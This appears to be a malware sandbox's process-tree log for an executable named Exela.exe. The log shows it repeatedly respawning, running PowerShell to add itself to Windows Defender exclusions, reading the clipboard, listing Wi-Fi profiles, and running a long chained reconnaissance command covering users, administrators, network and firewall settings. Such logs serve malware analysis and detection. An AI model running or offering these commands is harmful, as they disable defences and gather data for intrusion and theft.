        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        68⤵
        
        PID:3388
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        69⤵
        
        PID:3708
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        70⤵
        
        PID:3740
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Exela.exe'
        67⤵
        
        PID:1376
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        67⤵
        
        PID:4188
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        68⤵
        
        PID:4648
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        69⤵
        
        PID:1044
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Exela.exe'
        66⤵
        
        PID:4444
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        66⤵
        
        PID:540
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        67⤵
        
        PID:4752
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        68⤵
        
        PID:4064
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Exela.exe'
        65⤵
        
        PID:3948
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        65⤵
        
        PID:2748
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        66⤵
        
        PID:4436
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        67⤵
        
        PID:3512
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Exela.exe'
        64⤵
        
        PID:1156
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        64⤵
        
        PID:5056
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        65⤵
        
        PID:744
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        66⤵
        
        PID:1616
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Exela.exe'
        63⤵
        
        PID:3488
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        63⤵
        
        PID:2432
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        64⤵
        
        PID:5012
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        65⤵
        
        PID:4348
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Exela.exe'
        62⤵
        
        PID:1144
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        62⤵
        
        PID:2072
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        63⤵
        
        PID:956
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        64⤵
        
        PID:1688
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Exela.exe'
        61⤵
        
        PID:1208
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        61⤵
        
        PID:4564
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        62⤵
        
        PID:4980
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        63⤵
        
        PID:3576
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
        63⤵
        
        PID:3092
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        64⤵
        Detects videocard installed
        
        PID:3120
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic computersystem get Manufacturer"
        63⤵
        
        PID:3896
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic computersystem get Manufacturer
        64⤵
        
        PID:4048
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "gdb --version"
        63⤵
        
        PID:4008
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist"
        63⤵
        
        PID:3200
        
        C:\Windows\system32\tasklist.exe
        
        tasklist
        64⤵
        Enumerates processes with tasklist
        
        PID:4840
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic path Win32_ComputerSystem get Manufacturer"
        63⤵
        
        PID:2408
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path Win32_ComputerSystem get Manufacturer
        64⤵
        
        PID:4208
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        63⤵
        
        PID:1784
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        64⤵
        
        PID:2036
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist"
        63⤵
        
        PID:3280
        
        C:\Windows\system32\tasklist.exe
        
        tasklist
        64⤵
        Enumerates processes with tasklist
        
        PID:4292
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist"
        63⤵
        
        PID:5048
        
        C:\Windows\system32\tasklist.exe
        
        tasklist
        64⤵
        Enumerates processes with tasklist
        
        PID:820
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"
        63⤵
        
        PID:1020
        
        C:\Windows\system32\cmd.exe
        
        cmd.exe /c chcp
        64⤵
        
        PID:3400
        
        C:\Windows\system32\chcp.com
        
        chcp
        65⤵
        
        PID:1904
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"
        63⤵
        
        PID:1604
        
        C:\Windows\system32\cmd.exe
        
        cmd.exe /c chcp
        64⤵
        
        PID:4584
        
        C:\Windows\system32\chcp.com
        
        chcp
        65⤵
        
        PID:4084
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        63⤵
        
        PID:1444
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        64⤵
        Enumerates processes with tasklist
        
        PID:3496
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard"
        63⤵
        Clipboard Data
        
        PID:3464
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Get-Clipboard
        64⤵
        Clipboard Data
        
        PID:3424
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
        63⤵
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:4776
        
        C:\Windows\system32\netsh.exe
        
        netsh wlan show profiles
        64⤵
        Event Triggered Execution: Netsh Helper DLL
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:3716
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"
        63⤵
        Network Service Discovery
        
        PID:952
        
        C:\Windows\system32\systeminfo.exe
        
        systeminfo
        64⤵
        Gathers system information
        
        PID:4656
        
        C:\Windows\system32\HOSTNAME.EXE
        
        hostname
        64⤵
        
        PID:896
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic logicaldisk get caption,description,providername
        64⤵
        Collects information from the system
        
        PID:4692
        
        C:\Windows\system32\net.exe
        
        net user
        64⤵
        
        PID:2364
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user
        65⤵
        
        PID:3268
        
        C:\Windows\system32\query.exe
        
        query user
        64⤵
        
        PID:3604
        
        C:\Windows\system32\quser.exe
        
        "C:\Windows\system32\quser.exe"
        65⤵
        
        PID:1800
        
        C:\Windows\system32\net.exe
        
        net localgroup
        64⤵
        
        PID:3684
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 localgroup
        65⤵
        
        PID:736
        
        C:\Windows\system32\net.exe
        
        net localgroup administrators
        64⤵
        
        PID:1716
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 localgroup administrators
        65⤵
        
        PID:872
        
        C:\Windows\system32\net.exe
        
        net user guest
        64⤵
        
        PID:2760
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user guest
        65⤵
        
        PID:3400
        
        C:\Windows\system32\net.exe
        
        net user administrator
        64⤵
        
        PID:2832
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user administrator
        65⤵
        
        PID:3368
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic startup get caption,command
        64⤵
        
        PID:384
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /svc
        64⤵
        Enumerates processes with tasklist
        
        PID:2592
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig /all
        64⤵
        Gathers network information
        
        PID:2540
        
        C:\Windows\system32\ROUTE.EXE
        
        route print
        64⤵
        
        PID:4732
        
        C:\Windows\system32\ARP.EXE
        
        arp -a
        64⤵
        Network Service Discovery
        
        PID:4704
        
        C:\Windows\system32\NETSTAT.EXE
        
        netstat -ano
        64⤵
        System Network Connections Discovery
        Gathers network information
        
        PID:1044
        
        C:\Windows\system32\sc.exe
        
        sc query type= service state= all
        64⤵
        Launches sc.exe
        
        PID:2452
        
        C:\Windows\system32\netsh.exe
        
        netsh firewall show state
        64⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:2056
        
        C:\Windows\system32\netsh.exe
        
        netsh firewall show config
        64⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:2776
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        63⤵
        
        PID:3740
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        64⤵
        
        PID:3856
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        63⤵
        
        PID:4792
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        64⤵
        
        PID:2304
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Exela.exe'
        60⤵
        
        PID:5104
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        60⤵
        
        PID:4348
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        61⤵
        
        PID:4496
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        62⤵
        
        PID:1700
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Exela.exe'
        59⤵
        
        PID:4980
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        59⤵
        
        PID:4744
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        60⤵
        
        PID:4752
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        61⤵
        
        PID:408
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Exela.exe'
        58⤵
        
        PID:2136
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        58⤵
        
        PID:4644
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        59⤵
        
        PID:872
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        60⤵
        
        PID:3932
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Exela.exe'
        57⤵
        
        PID:3576
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        57⤵
        
        PID:4016
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        58⤵
        
        PID:3712
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        59⤵
        
        PID:2012
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Exela.exe'
        56⤵
        
        PID:3244
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        56⤵
        
        PID:440
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        57⤵
        
        PID:4848
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        58⤵
        
        PID:3496
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Exela.exe'
        55⤵
        
        PID:3712
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        55⤵
        
        PID:3944
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        56⤵
        
        PID:1572
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        57⤵
        
        PID:544
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Exela.exe'
        54⤵
        
        PID:3884
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        54⤵
        
        PID:4940
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        55⤵
        
        PID:2656
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        56⤵
        
        PID:1372
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Exela.exe'
        53⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4536
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        53⤵
        
        PID:2516
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        54⤵
        
        PID:4280
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        55⤵
        
        PID:2884
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Exela.exe'
        52⤵
        
        PID:1088
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        52⤵
        
        PID:3576
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        53⤵
        
        PID:512
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        54⤵
        
        PID:1100
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Exela.exe'
        51⤵
        
        PID:2948
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        51⤵
        
        PID:3924
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        52⤵
        
        PID:1444
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        53⤵
        
        PID:404
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Exela.exe'
        50⤵
        
        PID:1468
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        50⤵
        
        PID:116
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        51⤵
        
        PID:3676
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        52⤵
        
        PID:4680
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Exela.exe'
        49⤵
        
        PID:3416
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        49⤵
        
        PID:3172
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        50⤵
        
        PID:4316
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        51⤵
        
        PID:2340
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Exela.exe'
        48⤵
        
        PID:4988
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        48⤵
        
        PID:436
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        49⤵
        
        PID:3188
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        50⤵
        
        PID:3972
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Exela.exe'
        47⤵
        
        PID:2040
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        47⤵
        
        PID:1924
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        48⤵
        
        PID:4156
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        49⤵
        
        PID:3036
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Exela.exe'
        46⤵
        
        PID:3032
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        46⤵
        
        PID:1912
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        47⤵
        
        PID:4532
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        48⤵
        
        PID:5004
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Exela.exe'
        45⤵
        
        PID:4048
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        45⤵
        
        PID:3596
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        46⤵
        
        PID:2872
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        47⤵
        
        PID:740
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Exela.exe'
        44⤵
        
        PID:4120
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        44⤵
        
        PID:3688
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        45⤵
        
        PID:3292
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        46⤵
        
        PID:4388
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Exela.exe'
        43⤵
        
        PID:512
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        43⤵
        
        PID:2376
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        44⤵
        
        PID:4312
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        45⤵
        
        PID:1572
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Exela.exe'
        42⤵
        
        PID:2212
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        42⤵
        
        PID:5100
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        43⤵
        
        PID:5000
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        44⤵
        
        PID:4328
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Exela.exe'
        41⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3348
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        41⤵
        
        PID:4888
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        42⤵
        
        PID:2168
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        43⤵
        
        PID:2448
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Exela.exe'
        40⤵
        
        PID:404
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        40⤵
        
        PID:1376
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        41⤵
        
        PID:988
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        42⤵
        
        PID:4704
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Exela.exe'
        39⤵
        
        PID:5096
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        39⤵
        
        PID:4684
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        40⤵
        
        PID:1648
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        41⤵
        
        PID:1572
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Exela.exe'
        38⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4040
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        38⤵
        
        PID:2720
        
        C:\Users\Admin\AppData\Local\Temp\Exela.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Exela.exe"
        39⤵
        
        PID:1404
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        40⤵
        
